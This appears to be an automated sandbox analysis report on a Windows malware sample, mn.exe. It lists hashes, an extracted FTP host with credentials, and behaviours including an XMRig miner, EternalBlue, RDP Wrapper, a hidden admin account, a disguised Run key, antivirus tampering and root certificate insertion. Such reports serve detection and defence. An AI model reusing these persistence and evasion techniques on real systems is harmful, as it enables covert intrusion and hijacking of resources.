Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
07-04-2021 07:39
Static task
static1
Behavioral task
behavioral1
Sample
mn.exe
Resource
win7v20201028
General
-
Target
mn.exe
-
Size
11.9MB
-
MD5
387139f87dc3b8dd527bf15b64abd197
-
SHA1
65e227af49ed8a2015e9e9723507e261c9187e23
-
SHA256
39e6a32ee280960f6e4e2d4e38fb25e96ae8f5bd163bafb8ffeab87e2216e639
-
SHA512
3a9ba9a823f21f5d7620698ae6c96ff32c6646110a8fa1c652c3e1e39e59f58904244d65e5f9cd5da6e408f7515f9db62b2f13c16a8e54489fc88e0780c70ade
Malware Config
Extracted
Protocol: ftp- Host:
193.32.188.10 - Port:
21 - Username:
alex - Password:
easypassword
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\ProgramData\Windows\vp8encoder.dll acprotect C:\ProgramData\Windows\vp8decoder.dll acprotect -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/368-192-0x000000013F910000-0x000000013FEB0000-memory.dmp xmrig -
Processes:
resource yara_rule C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 \ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 \ProgramData\Windows\rfusclient.exe aspack_v212_v242 C:\ProgramData\Windows\rfusclient.exe aspack_v212_v242 -
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 2 IoCs
Processes:
cmd.exemn.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts mn.exe -
Executes dropped EXE 27 IoCs
Processes:
wini.exewinit.execheat.exenetsh.exetaskhost.exerutserv.exeicacls.exerutserv.exerfusclient.exerfusclient.exetaskhostw.exerfusclient.exeR8.exeRar.exetaskhost.exeRDPWInst.exewinlogon.exeRDPWInst.exescaner.exetaskhostw.exescandll.exestart.exerundll.exesystem.exesystem.exeEternalblue-2.2.0.exeMicrosoftHost.exepid process 1440 wini.exe 1700 winit.exe 560 cheat.exe 1156 netsh.exe 1568 taskhost.exe 1960 rutserv.exe 304 icacls.exe 240 rutserv.exe 1712 rfusclient.exe 1040 rfusclient.exe 1136 taskhostw.exe 1708 rfusclient.exe 2148 R8.exe 2896 Rar.exe 1028 taskhost.exe 3052 RDPWInst.exe 2260 winlogon.exe 2668 RDPWInst.exe 2868 scaner.exe 2984 taskhostw.exe 2196 scandll.exe 2060 start.exe 2764 rundll.exe 1648 system.exe 2524 system.exe 2504 Eternalblue-2.2.0.exe 368 MicrosoftHost.exe -
Modifies Windows Firewall 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\ProgramData\Windows\vp8encoder.dll upx C:\ProgramData\Windows\vp8decoder.dll upx -
Loads dropped DLL 63 IoCs
Processes:
mn.exewini.execmd.execheat.exerutserv.exetaskhost.execmd.exetaskeng.execmd.execmd.execmd.exesystem.exesystem.execmd.exeEternalblue-2.2.0.exetaskhost.exepid process 1856 mn.exe 1440 wini.exe 1440 wini.exe 1440 wini.exe 1440 wini.exe 1856 mn.exe 964 cmd.exe 560 cheat.exe 560 cheat.exe 560 cheat.exe 560 cheat.exe 240 rutserv.exe 1568 taskhost.exe 1568 taskhost.exe 2276 cmd.exe 2348 taskeng.exe 2460 cmd.exe 2248 2460 cmd.exe 2004 cmd.exe 2264 cmd.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 1648 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2524 system.exe 2424 cmd.exe 2424 cmd.exe 2504 Eternalblue-2.2.0.exe 2504 Eternalblue-2.2.0.exe 2504 Eternalblue-2.2.0.exe 2504 Eternalblue-2.2.0.exe 2504 Eternalblue-2.2.0.exe 2504 Eternalblue-2.2.0.exe 2504 Eternalblue-2.2.0.exe 2504 Eternalblue-2.2.0.exe 2504 Eternalblue-2.2.0.exe 1028 taskhost.exe -
Modifies file permissions 1 TTPs 56 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2436 icacls.exe 3004 icacls.exe 800 icacls.exe 2868 icacls.exe 304 icacls.exe 2172 icacls.exe 2668 icacls.exe 2332 icacls.exe 2684 icacls.exe 944 icacls.exe 676 icacls.exe 2972 icacls.exe 824 icacls.exe 2640 icacls.exe 2528 icacls.exe 2780 icacls.exe 2920 icacls.exe 2224 icacls.exe 1524 icacls.exe 1156 icacls.exe 2608 icacls.exe 824 icacls.exe 2592 icacls.exe 2228 icacls.exe 2200 icacls.exe 736 icacls.exe 2804 icacls.exe 2340 icacls.exe 2740 icacls.exe 2204 icacls.exe 2268 icacls.exe 2464 icacls.exe 2628 icacls.exe 2636 icacls.exe 2284 icacls.exe 1876 icacls.exe 2328 icacls.exe 2356 icacls.exe 2816 icacls.exe 2812 icacls.exe 2916 icacls.exe 2420 icacls.exe 2552 icacls.exe 2952 icacls.exe 2976 icacls.exe 2592 icacls.exe 304 icacls.exe 2516 icacls.exe 2544 icacls.exe 2528 icacls.exe 1516 icacls.exe 2880 icacls.exe 2680 icacls.exe 1408 icacls.exe 2220 icacls.exe 2864 icacls.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
mn.exetaskhostw.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run mn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" mn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
Processes:
mn.exeRDPWInst.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts mn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" mn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList mn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts mn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" mn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList mn.exe -
Drops file in System32 directory 2 IoCs
Processes:
taskhost.exedescription ioc process File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 taskhost.exe File opened for modification C:\Windows\System32\winmgmts:\localhost\ taskhost.exe -
Drops file in Program Files directory 26 IoCs
Processes:
mn.exeRDPWInst.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft JDX mn.exe File opened for modification C:\Program Files\Kaspersky Lab mn.exe File opened for modification C:\Program Files\Cezurity mn.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus mn.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File opened for modification C:\Program Files\Malwarebytes mn.exe File opened for modification C:\Program Files\COMODO mn.exe File opened for modification C:\Program Files\Enigma Software Group mn.exe File opened for modification C:\Program Files (x86)\AVG mn.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab mn.exe File opened for modification C:\Program Files (x86)\Panda Security mn.exe File opened for modification C:\Program Files (x86)\360 mn.exe File opened for modification C:\Program Files\AVAST Software mn.exe File opened for modification C:\Program Files (x86)\AVAST Software mn.exe File opened for modification C:\Program Files\Common Files\McAfee mn.exe File opened for modification C:\Program Files\ESET mn.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File created C:\Program Files\Common Files\System\iediagcmd.exe mn.exe File opened for modification C:\Program Files\ByteFence mn.exe File opened for modification C:\Program Files (x86)\SpyHunter mn.exe File opened for modification C:\Program Files\SpyHunter mn.exe File opened for modification C:\Program Files\AVG mn.exe File opened for modification C:\Program Files (x86)\Cezurity mn.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
winit.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1516 schtasks.exe 2616 schtasks.exe 2772 schtasks.exe 2800 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 744 timeout.exe 2464 timeout.exe 1052 timeout.exe 2624 timeout.exe 2664 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1516 ipconfig.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1824 taskkill.exe 2608 taskkill.exe 3020 taskkill.exe -
Modifies registry class 3 IoCs
Processes:
winit.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe -
Processes:
RDPWInst.exemn.exeRDPWInst.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RDPWInst.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a RDPWInst.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 RDPWInst.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 RDPWInst.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 RDPWInst.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616